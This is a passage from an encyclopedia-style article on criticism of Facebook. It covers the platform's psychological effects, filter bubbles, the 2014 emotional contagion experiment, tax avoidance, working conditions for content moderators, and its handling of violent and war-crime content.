Psychological/sociological effects[edit]

See also: Digital media use and mental health, Evolutionary medicine, Evolutionary mismatch, Evolutionary psychiatry, and Screen time

In addition to noting with evolutionary biologist George C. Williams in the development of evolutionary medicine that most chronic medical conditions are the consequence of evolutionary mismatches between a statelessenvironment of nomadichunter-gatherer life in bands and contemporary human life in sedentarytechnologically modernstate societies (e.g. WEIRD societies),[49] psychiatrist Randolph M. Nesse has argued that evolutionary mismatch is an important factor in the development of certain mental disorders.[50][51][52] In 1948, 50 percent of U.S. households owned at least one automobile.[53] In 2000, a majority of U.S. households had at least one personal computer and internet access the following year.[54] In 2002, a majority of U.S. survey respondents reported having a mobile phone.[55] In September 2007, a majority of U.S. survey respondents reported having broadband internet at home.[56] In January 2013, a majority of U.S. survey respondents reported owning a smartphone.[57]

Facebook addiction[edit]

See also: Digital media use and mental health § ADHD, Human multitasking, Media multitasking, Mobile phones and driving safety, Problematic social media use, and Texting while driving

The "World Unplugged" study, which was conducted in 2011, claims that for some users quitting social networking sites is comparable to quitting smoking or giving up alcohol.[58] Another study conducted in 2012 by researchers from the University of Chicago Booth School of Business in the United States found that drugs like alcohol and tobacco could not keep up with social networking sites regarding their level of addictiveness.[59] A 2013 study in the journal CyberPsychology, Behavior, and Social Networking found that some users decided to quit social networking sites because they felt they were addicted. In 2014, the site went down for about 30 minutes, prompting several users to call emergency services.[60]

In April 2015, the Pew Research Center published a survey of 1,060 U.S. teenagers ages 13 to 17 who reported that nearly three-quarters of them either owned or had access to a smartphone, 92 percent went online daily with 24 percent saying they went online "almost constantly".[61] In March 2016, Frontiers in Psychology published a survey of 457 post-secondary student Facebook users (following a face validity pilot of another 47 post-secondary student Facebook users) at a large university in North America showing that the severity of ADHD symptoms had a statistically significant positive correlation with Facebook usage while driving a motor vehicle and that impulses to use Facebook while driving were more potent among male users than female users.[62]

In June 2018, Children and Youth Services Review published a regression analysis of 283 adolescent Facebook users in the Piedmont and Lombardyregions of Northern Italy (that replicated previous findings among adult users) showing that adolescents reporting higher ADHD symptoms positively predicted Facebook addiction, persistent negative attitudes about the past and that the future is predetermined and not influenced by present actions, and orientation against achieving future goals, with ADHD symptoms additionally increasing the manifestation of the proposed category of psychological dependence known as "problematic social media use".[63]

Self-harm and suicide[edit]

Main articles: Social media and suicide and Facebook Files

Research shows that people who are feeling suicidal use the internet to search for suicide methods. Websites provide graphic details and information on how to take your own life. This cannot be right. Where this content breaches the policies of internet and social media providers it must be removed.

— Matt Hancock, Health Secretary of the United Kingdom[64]

I do not think it is going too far to question whether even you, the owners, any longer have any control over [the sites'] content. If that is the case, then children should not be accessing your services at all, and parents should be aware that the idea of any authority overseeing algorithms and content is a mirage.

— Anne Longfield, Children's Commissioner for England[65]

In January 2019, both the Health Secretary of the United Kingdom, and the Children's Commissioner for England, urged Facebook and other social media companies to take responsibility for the risk to children posed by content on their platforms related to self-harm and suicide.[65]

Envy[edit]

See also: Bandwagon effect, Conspicuous consumption, Conspicuous leisure, Consumerism, Issues in higher education in the United States § Financial value of degrees, LinkedIn § Research on labor market effects, Overtourism, Social aspects of television § Psychological effects, Tragedy of the commons, and Viral marketing

Facebook has been criticized for making people envious and unhappy due to the constant exposure to positive yet unrepresentative highlights of their peers. Such highlights include, but are not limited to, journal posts, videos, and photos that depict or reference such positive or otherwise outstanding activities, experiences, and facts. This effect is caused mainly by the fact that most users of Facebook usually only display the positive aspects of their lives while excluding the negative, though it is also strongly connected to inequality and the disparities between social groups as Facebook is open to users from all classes of society. Sites such as AddictionInfo.org[66] state that this kind of envy has profound effects on other aspects of life and can lead to severe depression, self-loathing, rage and hatred, resentment, feelings of inferiority and insecurity, pessimism, suicidal tendencies and desires, social isolation, and other issues that can prove very serious. This condition has often been called "Facebook Envy" or "Facebook Depression" by the media.[67][68][69][70][71][72]

In The Theory of the Leisure Class (1899), economist Thorstein Veblen observed that "Conspicuous consumption of valuable goods is a means of reputability to the gentleman of leisure",[73] and that conspicuous leisure is the "non-productive consumption of time. Time is consumed non-productively (1) from a sense of the unworthiness of productive work, and (2) as an evidence of pecuniary ability to afford a life of idleness. But the whole of the life of the gentleman of leisure is not spent before the eyes of the spectators who are to be impressed with that spectacle of honorific leisure which in the ideal scheme makes up his life. For some part of the time his life is perforce withdrawn from the public eye, and of this portion which is spent in private the gentleman of leisure should, for the sake of his good name, be able to give a convincing account."[74]

In 2010, Social Science Computer Review published research by economists Ralf Caers and Vanessa Castelyns who sent an online questionnaire to 398 and 353 LinkedIn and Facebook users respectively in Belgium and found that both sites had become tools for recruiting job applicants for professional occupations as well as additional information about applicants, and that it was being used by recruiters to decide which applicants would receive interviews.[75] In 2017, sociologist Ofer Sharone conducted interviews with unemployed workers to research the effects of LinkedIn and Facebook as labor market intermediaries and found that social networking services (SNS) have had a filtration effect that has little to do with evaluations of merit, and that the SNS filtration effect has exerted new pressures on workers to manage their careers to conform to the logic of the SNS filtration effect.[76]

In July 2019, sociologists Steve McDonald, Amanda K. Damarin, Jenelle Lawhorne, and Annika Wilcox performed qualitative interviews with 61 HR recruiters in two metropolitan areas in the Southern United States and found that recruiters filling low- and general-skilled positions typically posted advertisements on online job boards while recruiters filling high-skilled or supervisor positions targeted passive candidates on LinkedIn (i.e. employed workers not actively seeking work but possibly willing to change positions), and concluded that this is resulting in a bifurcated winner-takes-all job market with recruiters focusing their efforts on poaching already employed high-skilled workers while active job seekers are relegated to hyper-competitive online job boards.[77]

A joint study conducted by two German universities demonstrated Facebook envy and found that as many as one out of three people actually feel worse and less satisfied with their lives after visiting the site. Vacation photos were found to be the most common source of feelings of resentment and jealousy. After that, social interaction was the second biggest cause of envy, as Facebook users compare the number of birthday greetings, likes, and comments to those of their friends. Visitors who contributed the least tended to feel the worst. "According to our findings, passive following triggers invidious emotions, with users mainly envying happiness of others, the way others spend their vacations; and socialize", the study states.[78]

A 2013 study by researchers at the University of Michigan found that the more people used Facebook, the worse they felt afterwards.[79][71][72]

Narcissistic users who show excessive grandiosity give negative emotion to viewers and cause envy, but as a result, that may cause viewers' loneliness. Viewers sometimes need to terminate relationships with them to avoid this negative emotion. However, this "avoidance" such as "terminate relationships" would be reinforcement and it may lead to loneliness. The cyclical pattern is a vicious circle of loneliness and avoidance coping, the study states.[80]

Divorce[edit]

See also: Online dating service § Social trends and public opinions, and Social aspects of television § Psychological effects

Social networks, like Facebook, can have a detrimental effect on marriages, with users becoming worried about their spouse's contacts and relations with other people online, leading to marital breakdown and divorce.[81] According to a 2009 survey in the UK, around 20 percent of divorce petitions included references to Facebook.[82][83][84][85] Facebook has given us a new platform for interpersonal communication. Researchers proposed that high levels of Facebook use could result in Facebook-related conflict and breakup/divorce.[86] Previous studies have shown that romantic relationships can be damaged by excessive Internet use, Facebook jealousy, partner surveillance, ambiguous information, and online portrayal of intimate relationships.[87][88][89][90][91] Excessive Internet users reported having greater conflict in their relationships. Their partners feel neglected and there's lower commitment and lower feelings of passion and intimacy in the relationship. According to the article, researchers suspect that Facebook may contribute to an increase in divorce and infidelity rates in the near future due to the amount and ease of accessibility to connect with past partners.[86]

Stress[edit]

Research performed by psychologists from Edinburgh Napier University indicated that Facebook adds stress to users' lives. Causes of stress included fear of missing important social information, fear of offending contacts, discomfort or guilt from rejecting user requests or deleting unwanted contacts or being unfriended or blocked by Facebook friends or other users, the displeasure of having friend requests rejected or ignored, the pressure to be entertaining, criticism or intimidation from other Facebook users, and having to use appropriate etiquette for different types of friends.[92] Many people who started using Facebook for positive purposes or with positive expectations have found that the website has negatively impacted their lives.[93]

Next to that, the increasing number of messages and social relationships embedded in SNS also increases the amount of social information demanding a reaction from SNS users. Consequently SNS users perceive they are giving too much social support to other SNS friends. This dark side of SNS usage is called 'social overload'. It is caused by the extent of usage, number of friends, subjective social support norms, and type of relationship (online-only vs offline friends) while age has only an indirect effect. The psychological and behavioral consequences of social overload include perceptions of SNS exhaustion, low user satisfaction, and high intentions to reduce or stop using SNS.[94]

Narcissism[edit]

Main articles: Digital media use and mental health § NPD, Narcissistic personality disorder, Facebook like button, Mass shootings in the United States § Contributing factors, Microblogging, Reblogging, Selfie, and Virtue signalling

See also: Fear of missing out, Law of effect, Like button, Problematic social media use, Social rejection, and White savior

In July 2018, a meta-analysis published in Psychology of Popular Media found that grandiose narcissism positively correlated with time spent on social media, frequency of status updates, number of friends or followers, and frequency of posting self-portrait digital photographs,[95] while a meta-analysis published in the Journal of Personality in April 2018 found that the positive correlation between grandiose narcissism and social networking service usage was replicated across platforms (including Facebook).[96] In March 2020, the Journal of Adult Development published a regression discontinuity analysis of 254 Millennial Facebook users investigating differences in narcissism and Facebook usage between the age cohorts born from 1977 to 1990 and from 1991 to 2000 and found that the later born Millennials scored significantly higher on both.[97] In June 2020, Addictive Behaviors published a systematic review finding a consistent, positive, and significant correlation between grandiose narcissism and the proposed category of psychological dependence called "problematic social media use".[98] Also in 2018, social psychologist Jonathan Haidt and FIRE President Greg Lukianoff noted in The Coddling of the American Mind that former Facebook president Sean Parker stated in a 2017 interview that the Like button was consciously designed to prime users receiving likes to feel a dopaminerush as part of a "social-validationfeedbackloop".[99]

"Conspicuous compassion" is the practice of publicly donating large sums of money to charity to enhance the social prestige of the donor, and is sometimes described as a type of conspicuous consumption.[100][101] Jonathan Haidt and Greg Lukianoff argued that microaggression training on college campuses in the United States has led to a call-out culture and a climate of self-censorship due to fear of shaming by virtue signalling social media mobs with users who are often anonymous and tend to deindividuate as a consequence.[102] Citing February 2017 Pew Research Center survey data showing that critical Facebook postings expressing "indignant disagreement" were twice as likely to receive likes, comments, or shares (along with a similar finding for Twitter posts published in PNAS USA in July 2017),[103][104] Haidt and Tobias Rose-Stockwell cite the phrase "moral grandstanding" to describe how having an audience on social media forums converts much of its interpersonal communication into a public performance.[105]

Following the murder of George Floyd in May 2020 and the subsequent protests in his name, Civiqs and YouGov/Economist polls showed that while net support for Black Lives Matter among White Americans increased from –4 points to +10 points in early June 2020 (with 43 percent in support) it fell to –6 points by early August 2020,[106] and by April 2021, further Civiqs polls showed that support for Black Lives Matter among White Americans had reverted to roughly its level of support prior to George Floyd's murder (37 percent in favor and 49 percent opposed).[107] In a February 2021 interview on Firing Line, journalist Charles M. Blow criticized a minority of young white protestors in the George Floyd protests in the United States whom he argued were using the protests for their own personal growth to substitute for social rites of passage (e.g. prom) and summertime social gatherings (e.g. attending movie theaters or concerts) that were precluded by COVID-19 lockdowns and social distancing measures, noting that as lockdowns began to be relaxed and removed, support for Black Lives Matter among whites began to decline.[108]

In February 2021, Psychological Medicine published a survey reviewing 14,785 publicly reported murders in English language news worldwide between 1900 and 2019 compiled in a database by psychiatrists at the New York State Psychiatric Institute and the Columbia University Irving Medical Center that found that of the 1,315 personal-cause mass murders (i.e. driven by personal motivations and not occurring within the context of war, state-sponsored or group-sponsored terrorism, gang activity, or organized crime) only 11 percent of mass murderers and only 8 percent of mass shooters had a "serious mental illness" (e.g. schizophrenia, bipolar disorder, major depressive disorder), that mass shootings have become more common than other forms of mass murder since 1970 (with 73 percent occurring in the United States alone), and that mass shooters in the United States were more likely to have legal histories, to engage in recreational drug use or alcohol abuse, and to display non-psychotic psychiatric or neurologic symptoms.[109][110][111]

Survey coauthor psychiatrist Paul S. Appelbaum argued that the data from the survey indicated that "difficulty coping with life events seem more useful foci for prevention [of mass shootings] and policy than an emphasis on serious mental illness",[112] while psychiatrist Ronald W. Pies has suggested that psychopathology should be understood as a three-gradation continuum of mental, behavioral and emotional disturbance with most mass shooters falling into a middle category of "persistent emotional disturbance".[113] In 2015, psychiatrists James L. Knoll and George D. Annas noted that the tendency of most media attention following mass shootings on mental health leads to sociocultural factors being comparatively overlooked.[114] Instead, Knoll and Annas cite research by social psychologists Jean Twenge and W. Keith Campbell on narcissism and social rejection in the personal histories of mass shooters, as well as cognitive scientist Steven Pinker's suggestion in The Better Angels of Our Nature (2011) that further reductions in human violence may be dependent upon reducing human narcissism.[115][116]

Non-informing, knowledge-eroding medium[edit]

Main articles: News Feed, Facebook Files, Big data, Confirmation bias, Echo chamber (media), Facebook like button, Filter bubble, Infotainment, Political polarization, and Radicalization

See also: Like button, Negative partisanship, Online youth radicalization, Political polarization in the United States, and Social aspects of television § Political polarization

Facebook is a Big Tech company with over 2.7 billion monthly active users as of the second quarter of 2020 and therefore has a meaningful impact on the masses that use it.[117]Big data algorithms are used in personalized content creation and automatization; however, this method can be used to manipulate users in various ways.[118] The problem of misinformation is exacerbated by the educational bubble, users' critical thinking ability and news culture.[119] Based on a 2015 study, 62.5% of the Facebook users are oblivious to any curation of their News Feed. Furthermore, scientists have started to investigate algorithms with unexpected outcomes that may lead to antisocial political, economic, geographic, racial, or other discrimination. Facebook has remained scarce in transparency of the inner workings of the algorithms used for News Feed correlation.[120] Algorithms use the past activities as a reference point for predicting users' taste to keep them engaged. However, this leads to the formation of a filter bubble that starts to refrain users from diverse information. Users are left with a skewed worldview derived from their own preferences and biases.[121]

In 2015, researchers from Facebook published a study indicating that the Facebook algorithm perpetuates an echo chamber amongst users by occasionally hiding content from individual feeds that users potentially would disagree with: for example the algorithm removed one in every 13 diverse content from news sources for self-identified liberals. In general, the results from the study indicated that the Facebook algorithm ranking system caused approximately 15% less diverse material in users' content feeds, and a 70% reduction in the click-through-rate of the diverse material.[122][123] In 2018, social psychologist Jonathan Haidt and FIRE President Greg Lukianoff argued in The Coddling of the American Mind that the filter bubbles created by the News Feed algorithm of Facebook and other platforms are one of the principal factors amplifying political polarization in the United States since 2000 (when a majority of U.S. households first had at least one personal computer and then internet access the following year).[124][125]

In his Reflections on the Revolution in France (1790), philosopher Edmund Burke observed "We are afraid to put men to live and trade each on his own private stock of reason; because we suspect that this stock in each man is small, and that the individuals would do better to avail themselves of the general bank and capital of nations and of ages."[126] In The Signal and the Noise (2012), statistician Nate Silver noted that IBM had estimated that the world was generating 2.5 quintillionbytes of data each day (more than 90 percent of which was created in the previous two years), and that the increase in data was analogous to increases in book production as a consequence of the invention of the printing press in 1440 by Johannes Gutenberg as well as the effect of the increase in book production in causing the Reformation, the Counter-Reformation, and the European wars of religion.[127]

Citing Burke, Jonathan Haidt and Tobias Rose-Stockwell suggested in The Atlantic in December 2019 that because the proportion of most of the information that Generation Z receives due to regular social media usage is information created primarily within the past month (e.g. cat videos, tabloid gossip about celebrities, sensationalistichot takes on news items) rather than information created in decades or centuries past, members of Generation Z are less familiar with the accumulated knowledge and wisdom of humanity (e.g. great ideas, great books, history) than generations past, and as a consequence, are more prone to embrace misguided ideas that bring them greater esteem and prestige within their immediate social network (noting the declining faith among Generation Z in democracy across the ideological spectrum in polling data alongside renewed interest in socialism, communism, and Nazism that is reflective of ignorance of the history of the 20th century).[105][128][129]

Facebook has, at least in the political field, a counter-effect on being informed: in two studies from the US with a total of more than 2,000 participants, the influence of social media on the general knowledge on political issues was examined in the context of two US presidential elections. The results showed that the frequency of Facebook use was moderately negatively related to general political knowledge. This was also the case when considering demographic, political-ideological variables and previous political knowledge. According to the latter, a causal relationship is indicated: the higher the Facebook use, the more the general political knowledge declines.[130] In 2019, Jonathan Haidt argued that there is a "very good chance American democracy will fail, that in the next 30 years we will have a catastrophic failure of our democracy."[131] Following the 2021 United States Capitol attack, in February 2021, Facebook announced that it would reduce the amount of political content in users News Feeds.[132]

Other psychological effects[edit]

It has been admitted by many students that they have experienced bullying on the site, which leads to psychological harm. Students of high schools face a possibility of bullying and other adverse behaviors over Facebook every day. Many studies have attempted to discover whether Facebook has a positive or negative effect on children's and teenagers' social lives, and many of them have come to the conclusion that there are distinct social problems that arise with Facebook usage. British neuroscientist Susan Greenfield stuck up for the issues that children encounter on social media sites. She said that they can rewire the brain, which caused some hysteria over whether or not social networking sites are safe. She did not back up her claims with research, but did cause quite a few studies to be done on the subject. When that self is then broken down by others by badmouthing, criticism, harassment, criminalization or vilification, intimidation, demonization, demoralization, belittlement, or attacking someone over the site it can cause much of the envy, anger, or depression.[133][134][135]

Sherry Turkle, in her book Alone Together: Why We Expect More from Technology and Less from Each Other, argues that social media brings people closer and further apart at the same time. One of the main points she makes is that there is a high risk in treating persons online with dispatch like objects. Although people are networked on Facebook, their expectations of each other tend to be lessened. According to Turkle, this could cause a feeling of loneliness in spite of being together.[136]

Between 2016 and 2018, the number of 12- to 15-year-olds who reported being bullied over social media rose from 6% to 11%, in the region covered by Ofcom.[65][better source needed]

User influence experiments[edit]

Academic and Facebook researchers have collaborated to test if the messages people see on Facebook can influence their behavior. For instance, in "A 61-Million-Person Experiment in Social Influence And Political Mobilization", during the 2010 elections, Facebook users were given the opportunity to "tell your friends you voted" by clicking on an "I voted" button. Users were 2% more likely to click the button if it was associated with friends who had already voted.[137]

Much more controversially, a 2014 study of "Emotional Contagion Through Social Networks" manipulated the balance of positive and negative messages seen by 689,000 Facebook users.[138] The researchers concluded that they had found "some of the first experimental evidence to support the controversial claims that emotions can spread throughout a network, [though] the effect sizes from the manipulations are small."[139]

Unlike the "I voted" study, which had presumptively beneficial ends and raised few concerns, this study was criticized for both its ethics and methods/claims. As controversy about the study grew, Adam Kramer, a lead author of both studies and member of the Facebook data team, defended the work in a Facebook update.[140] A few days later, Sheryl Sandburg, Facebook's COO, made a statement while traveling abroad. While at an Indian Chambers of Commerce event in New Delhi she stated that "This was part of ongoing research companies do to test different products, and that was what it was. It was poorly communicated and for that communication we apologize. We never meant to upset you."[141]

Shortly thereafter, on July 3, 2014, USA Today reported that the privacy watchdog group Electronic Privacy Information Center (EPIC) had filed a formal complaint with the Federal Trade Commission claiming that Facebook had broken the law when it conducted the study on the emotions of its users without their knowledge or consent. In its complaint, EPIC alleged that Facebook had deceived users by secretly conducting a psychological experiment on their emotions: "At the time of the experiment, Facebook did not state in the Data Use Policy that user data would be used for research purposes. Facebook also failed to inform users that their personal information would be shared with researchers."[142]

Beyond the ethical concerns, other scholars criticized the methods and reporting of the study's findings. John Grohol, writing for Psych Central, argued that despite its title and claims of "emotional contagion", this study did not look at emotions at all. Instead, its authors used an application (called "Linguistic Inquiry and Word Count" or LIWC 2007) that simply counted positive and negative words to infer users' sentiments. He wrote that a shortcoming of the LIWC tool is that it does not understand negations. Hence, the tweet "I am not happy" would be scored as positive: "Since the LIWC 2007 ignores these subtle realities of informal human communication, so do the researchers." Grohol concluded that given these subtleties, the effect size of the findings are little more than a "statistical blip".

Kramer et al. (2014) found a 0.07%—that's not 7 percent, that's 1/15th of one percent!!—decrease in negative words in people's status updates when the number of negative posts on their Facebook news feed decreased. Do you know how many words you'd have to read or write before you've written one less negative word due to this effect? Probably thousands.[143]

The consequences of the controversy are pending (be it FTC or court proceedings) but it did prompt an "Editorial Expression of Concern"[144] from its publisher, the Proceedings of the National Academy of Sciences, as well as a blog posting from OkCupid titled "We experiment on human beings!"[145] In September 2014, law professor James Grimmelmann argued that the actions of both companies were "illegal, immoral, and mood-altering" and filed notices with the Maryland Attorney General and Cornell Institutional Review Board.[146]

In the UK, the study was also criticized by the British Psychological Society which said, in a letter to The Guardian, "There has undoubtedly been some degree of harm caused, with many individuals affected by increased levels of negative emotion, with consequent potential economic costs, increase in possible mental health problems and burden on health services. The so-called 'positive' manipulation is also potentially harmful."[147]

Tax avoidance[edit]

See also: Ireland as a tax haven

Facebook uses a complicated series of shell companies in tax havens to avoid paying billions of dollars in corporate tax.[148] According to The Express Tribune, Facebook is among the corporations that "avoided billions of dollars in tax using offshore companies."[149] For example, Facebook routes billions of dollars in profits using the Double Irish and Dutch Sandwich tax avoidance schemes to bank accounts in the Cayman Islands. The Dutch newspaper NRC Handelsblad concluded from the Paradise Papers published in late 2017 that Facebook pays "practically no taxes" worldwide.[150]

For example, Facebook paid:

  • In 2011, £2.9m tax on £840m profits in the UK;
  • In 2012 and 2013 no tax in the UK;
  • In 2014 £4,327 tax on hundreds of millions of pounds in UK revenues which were transferred to tax havens.[151]

According to economist and member of the PvdA delegation inside the Progressive Alliance of Socialists & Democrats in the European Parliament (S&D) Paul Tang, between 2013 and 2015 the EU lost an estimated €1,453m – €2,415m to Facebook.[152] When comparing to others countries outside the EU, the EU is only taxing Facebook with a rate of 0.03% to 0.1% of its revenue (around 6% of its EBT) whereas this rate is near 28% in countries outside the EU. Even had a rate between 2% and 5% been applied during this period – as suggested by the ECOFIN Council – a fraud of this rate by Facebook would have meant a loss to the EU between €327m and €817m.[152]

Revenue (m EUR) EBT (m EUR) Tax (m EUR) Tax / EBT Tax / Revenue
Total EU Rest of the world Total EU Rest of the world Total EU Rest of the world Total EU Rest of the world Total EU Rest of the world
Facebook Inc.20135,720 3,069 2,651 2,001 (4) 2,005 911 3 908 46% n.a 45% 15.93% 0.10%34.25%
201410,299 5,017 5,282 4,057 (20) 4,077 1,628 5 1,623 40% n.a 40% 15.81% 0.09%30.73%
201516,410 8,253 8,157 5,670 (43) 5,627 2,294 3 2,291 40% 6% 41% 13.98% 0.03%28.09%

On July 6, 2016, the U.S. Department of Justice filed a petition in the U.S. District Court in San Francisco, asking for a court order to enforce an administrative summons issued to Facebook, Inc., under Internal Revenue Code section 7602,[153] in connection with an Internal Revenue Service examination of Facebook's year 2010 U.S. Federal income tax return.[154][155]

In November 2017, the Irish Independent recorded that for the 2016 financial year, Facebook had paid €30 million of Irish corporation tax on €12.6 billion of revenues that were routed through Ireland, giving an Irish effective tax rate of under 1%.[156] The €12.6 billion of 2016 Facebook revenues routed through Ireland was almost half of Facebook's global revenues.[157] In April 2018, Reuters wrote that all of Facebook's non–U.S. accounts were legally housed in Ireland for tax purposes, but were being moved due to the May 2018 EU GDPR regulations.[158]

In November 2018, the Irish Times reported that Facebook routed over €18.7 billion of revenues through Ireland (almost half all global revenues), on which it paid €38 million of Irish corporation tax.[159]

Treatment of employees and contractors[edit]

Moderators[edit]

See also: Cognizant § Working conditions and mental health issues, and Arvato § Facebook content moderation

Facebook hires some employees through contractors, including Accenture, Arvato, Cognizant, CPL Resources, and Genpact, to serve as content moderators, reviewing potentially problematic content posted to both Facebook and Instagram.[164] Many of these contractors face unrealistic expectations, harsh working conditions, and constant exposure to disturbing content, including graphic violence, animal abuse, and child pornography.[160][161] Contractor employment is contingent on achieving and maintaining a score of 98 on a 100-point scale on a metric known as "accuracy". Falling below a score of 98 can result in dismissal. Some have reported posttraumatic stress disorder (PTSD) stemming from lack of access to counseling, coupled with unforgiving expectations and the violent content they are assigned to review.[160]

Content moderator Keith Utley, who was employed by Cognizant, experienced a heart attack during work in March 2018; the office lacked a defibrillator, and Utley was transported to a hospital where he died.[162][165] Selena Scola, an employee of contractor Pro Unlimited, Inc., sued her employer after she developed PTSD as a result of "constant and unmitigated exposure to highly toxic and extremely disturbing images at the workplace".[166] In December 2019, former Cpl employee Chris Gray began legal action in the High Court of Ireland, claiming damages for PTSD suffered as a moderator,[167] the first of an estimated 20+ pending cases. In February 2020, employees in Tampa, Florida filed a lawsuit against Facebook and Cognizant alleging they developed PTSD and related mental health impairments as a result of constant and unmitigated exposure to disturbing content.[168]

In February 2020, the European Union Commissioners criticized the plans that Facebook has for dealing with the working conditions of those who are contracted to moderate content on the social media platform.[169]

Facebook agreed to settle a class action lawsuit for $52 million on May 12, 2020, which included a $1,000 payment to each of the 11,250 moderators in the class, with additional compensation available for the treatment of PTSD and other conditions resulting from the jobs.[170][171][172]

Employees[edit]

Plans for a Facebook-owned real estate development known as "Willow Village" have been criticized for resembling a "company town", which often curtails the rights of residents, and encourages or forces employees to remain within an environment created and monitored by their employer outside of work hours.[173] Critics have referred to the development as "Zucktown" and "Facebookville" and the company has faced additional criticism for the effect it will have on existing communities in California.

The operational manager at Facebook as of March 2021, along with three former candidates of the Facebook hiring process complained to the EEOC of racial bias being practiced at the company against Black people. The current employee, Oscar Veneszee Jr. accused the firm of conducting subjective evaluations and pushing the idea of racial stereotypes. The EEOC has labeled the practice as 'systemic' racial bias and has initiated an investigation.[174]

Misleading campaigns against competitors[edit]

In May 2011, emails were sent to journalists and bloggers making critical allegations about Google's privacy policies; however, it was later discovered that the anti-Google campaign, conducted by PR giant Burson-Marsteller, was paid for by Facebook in what CNN referred to as "a new level skullduggery" and which Daily Beast called a "clumsy smear". While taking responsibility for the campaign, Burson-Marsteller said it should not have agreed to keep its client's (Facebook's) identity a secret. "Whatever the rationale, this was not at all standard operating procedure and is against our policies, and the assignment on those terms should have been declined", it said.[175]

In December 2020, Apple Inc. announced an initiative of Anti-Tracking measures (opt-in tracking policy) to be introduced to their App Store Services. Facebook quickly reacted and started to criticise the initiative, claiming the Apple's anti-tracking privacy focused change will have "harmful impact on many small businesses that are struggling to stay afloat and on the free internet that we all rely on more than ever". Facebook also launched a so-called "Speak Up For Small Businesses" page. Apple in their response stated that "users should know when their data is being collected and shared across other apps and websites — and they should have the choice to allow that or not". Apple was also backed up by Electronic Frontier Foundation (EFF) who stated that "Facebook touts itself in this case as protecting small businesses, and that couldn't be further from the truth".[176]

Copying competitors' products and features[edit]

Beyond acquiring competitors in the social and messaging space with strong potential, Facebook often simply copies products or features to get to the market faster. Internal emails have shown that Facebook's leadership, including Mark Zuckerberg were frustrated by the time the company spends on prototyping,and suggested to explore copying entire products like Pinterest. “Copying is faster than innovating” - admitted an employee on the internal email thread, which continued: “If you gave the top-down order to go ahead, copy e.g. Pinterest or the gaming dynamics on Foursquare ... I am sure [a] very small team of engineers, a [product manager], and a designer would get it done super quickly.”[177][178]

Many Facebook employees seem to be questioning Facebook's approach of cloning competitors. According to leaks, a top quoted question in Facebook's internal all-hands was: “What is our next big product, which does not imitate already existing products on the market?”[179]

Snapchat[edit]

In 2014 Facebook launched Slingshot, an app for sending ephemeral photos like Snapchat does. In 2016 the company built Instagram Stories, which is a copy of Snapchat's most popular feature.[180]

TikTok[edit]

In August 2020, Facebook has built Instagram Reels, a feature that functions and looks similar to TikTok.[181]

Pinterest[edit]

Facebook, for several months, was experimenting with an app called Hobbi, that took many cues from Pinterest.[182]

Clubhouse[edit]

In the summer of 2021, Facebook started to roll out Live Audio Rooms, which resembles Clubhouse.[183]

Content[edit]

An example of a Facebook post censored due to an unspecified conflict with "Community Standards"
Error message generated by Facebook for an attempt to share a link to a website that is censored due to Community Standards in a private chat. Messages containing certain links will not be delivered to the recipient.

Facebook has been criticized for removing or allowing various content (posts, photos and entire groups and profiles).

Intellectual property infringement[edit]

Facebook has also been criticized for having lax enforcement of third-party copyrights for videos uploaded to the service. In 2015, some Facebook pages were accused of plagiarizing videos from YouTube users and re-posting them as their own content using Facebook's video platform, and in some cases, achieving higher levels of engagement and views than the original YouTube posts. Videos hosted by Facebook are given a higher priority and prominence within the platform and its user experience (including direct embedding within the News Feed and pages), giving a disadvantage to posting it as a link to the original external source.[184][185] In August 2015, Facebook announced a video-matching technology aiming to identify reposted videos, and also stated its intention to improve its procedures to remove infringing content faster.[186] In April 2016, Facebook implemented a feature known as "Rights Manager", which allows rights holders to manage and restrict the upload of their content onto the service by third-parties.[187]

Violent content[edit]

In 2013, Facebook was criticized for allowing users to upload and share videos depicting violent content, including clips of people being decapitated. Having previously refused to delete such clips under the guideline that users have the right to depict the "world in which we live", Facebook changed its stance in May, announcing that it would remove reported videos while evaluating its policy.[188] The following October, Facebook stated that it would allow graphic videos on the platform, as long as the intention of the video was to "condemn, not glorify, the acts depicted", further stating that "Sometimes, those experiences and issues involve graphic content that is of public interest or concern, such as human rights abuses, acts of terrorism, and other violence. When people share this type of graphic content, it is often to condemn it. If it is being shared for sadistic pleasure or to celebrate violence, Facebook removes it."[190] However, Facebook once again received criticism, with the Family Online Safety Institute saying that such videos "crossed a line" and can potentially cause psychological damage among young Facebook users, and then-Prime Minister of the United KingdomDavid Cameron calling the decision "irresponsible", citing the same concerns regarding young users.[190] Two days later, Facebook removed a video of a beheading following "worldwide outrage", and while acknowledging its commitment to allowing people to upload gory material for the purpose of condemnation, it also stated that it would be further strengthening its enforcement to prevent glorification.[190] The company's policies were also criticized as part of these developments, with some drawing particular attention to Facebook's permission of graphic content but potential removal of breastfeeding images.[191] In January 2015, Facebook announced that new warnings would be displayed on graphic content, requiring users to explicitly confirm that they wish to see the material.[192][193]

War crimes[edit]

Facebook has been criticized for failing to take down violent content depicting war crimes in Libya. A 2019 investigation by the BBC[194] found evidence of alleged war crimes in Libya being widely shared on Facebook and YouTube. The BBC found images and videos on social media of the bodies of fighters and civilians being desecrated by fighters from the self-styled Libyan National Army. The force, led by General Khalifa Haftar, controls a swathe of territory in the east of Libya and is trying to seize the capital, Tripoli. BBC Arabic found almost one hundred images and videos from Libya shared on Facebook and YouTube, in violation of their companies' guidelines.[195] The UK Foreign Office said it took the allegations extremely seriously and is concerned about the impact the recent violence is having on the civilian population.[196]

In 2017, a Facebook video of Libyan National Army (LNA) special forces commander Mahmoud al-Werfalli was uploaded showing him shooting dead three captured fighters. The video was then shared on YouTube over ten thousand times. The International Criminal Court used it as evidence to indict al-Werfalli for the war crime of murder.[197] The BBC found the original video was still on Facebook 2 years after his indictment and also discovered videos showing the bodies of civilians being desecrated.[citation needed] These were taken in Ganfouda, a district of Benghazi which was under siege by the LNA between 2016 and 2017. More than 300 people, including dozens of children died during the siege. A video uncovered by BBC Arabic showed soldiers mocking a pile of corpses of dead civilians and trampling on bodies. Among them was a 77-year-old woman, Alia Hamza. Her son, Ali Hamza, had five family members killed in Ganfouda.

